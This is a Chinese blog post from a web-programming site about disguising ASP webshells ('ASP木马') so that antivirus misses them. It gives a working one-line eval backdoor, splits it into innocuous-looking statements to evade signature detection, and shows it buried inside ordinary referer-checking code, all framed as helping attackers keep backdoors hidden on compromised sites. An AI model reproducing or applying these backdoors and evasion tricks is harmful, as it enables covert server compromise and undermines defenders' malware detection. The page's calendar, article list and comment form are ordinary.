2008年12月
123456
78910111213
14151617181920
21222324252627
28293031
日 志 标 题 点击
在WindowsXP... 7920
新浪首页全屏显示广告... 7250
PHP动态网站开发中... 8246
PHP常用的正则表达... 10008
浅谈PHP验证用户信... 11176
PHP实现翻页处理 3212
一行代码杜绝ifra... 945
用PHP4中的PDF... 1119
PHP脚本的技巧--... 891
经典正则表达式 940
ASP采集教程基础篇 957
WML语言基础(WA... 825
WML语言基础(WA... 783
WML语言基础(WA... 5567
WML语言基础(WA... 816
WML语言基础(WA... 1011
ASP组件自动生成图... 1223
将Access数据导... 2299
用ASP编程在线生成... 1330
提高IIS服务器的执... 3015
图解支持多语言环境的... 1243
从海洋说ASP木马变... 1538
ASp使用AspJp... 8916
ASP:技巧:创建网... 4236
ASP网站的漏洞分解... 4174
利用ASP代码实现对... 3460
实例:ASP实现长文... 3231
WML语言基础(WA... 2730
 
 
全部文章生活感慨科技新闻网络编程电脑故障Linux
从海洋说ASP木马变形与隐身
[作者:admin] [来自:本站原创] [天气:晴朗] [阅读:1538次]

我是抛砖引玉,希望大家多发表看法。

怎么让你的ASP马儿更安全,更深的隐藏到对方的程序中

昨天朋友叫我帮他传个马,进过抓包分析,发现可以上传ASP,但上传后文件竟然找不到了。估计是被杀了,我们先看马儿的代码:

<%eval(request("#"))%>

(小注:海洋的一句话后门。我前面有个写后门的贴子是怎么隐藏生成这样的后门。)

杀毒软件会读取特征字符串

eval(request("

而它们都是关键词,怎么变形呢?拆分单词肯定是不行的。

我们把两个东东分开来写,加个变量进去。

<%

efan=request("id")
eval(efan)
'注:第一句属于获取正常提交的变量id的值,杀毒软件不会连浏览GET提交都杀吧?你放一百二十个心,这句绝对不会被当病毒。但是id常用来提交正常的数值,所以建议还是在使用的时候改个别的变量。但如果本页没有相关的id变量,我们用它当后门的提交值,那更爽不过,没人会怀疑。
'第二这句更简,也不会被监测。可以插下后面的任何位置,不必放在一起
%>

这样一变,任何杀毒软件都过关了,因为两句都是正常调用和执行。或者说连分析程序的工程师看着这样的代码,也不会当成是病毒吧?这样不仅闪过了杀毒软件,让你的后门更安全的永驻“内脏”。

上传后,成功绕过杀毒软件。

我用一段代码示范后门的隐身:

正常代码

Dim sHttp_Referer, sServer_Name
sHttp_Referer = CStr(Request.ServerVariables("HTTP_REFERER"))
sServer_Name = CStr(Request.ServerVariables("SERVER_NAME"))
If Mid(sHttp_Referer, 8, Len(sServer_Name)) = sServer_Name Then
IsSelfRefer = True
Else
IsSelfRefer = False
End If

插马后的代码

Dim sHttp_Referer, sServer_Name,efan
efan=request("id")
sHttp_Referer = CStr(Request.ServerVariables("HTTP_REFERER"))
sServer_Name = CStr(Request.ServerVariables("SERVER_NAME"))
If Mid(sHttp_Referer, 8, Len(sServer_Name)) = sServer_Name Then
IsSelfRefer = True
Else
IsSelfRefer = False
End If
eval(efan)

这样,你的马儿会更安全。


本日志由 admin 于 2007-7-13 8:20:15 编辑
请在下面填写你的评论内容
您的大名:  验证码:  
评论内容: 评论内容支持HTML
上传图片:
相关图片: 网络图片地址
 
 
E-MAIL:shyxh123@sina.com 皖ICP备07001445号  

Copyright © 清风网络工作室 All Rights Reserved.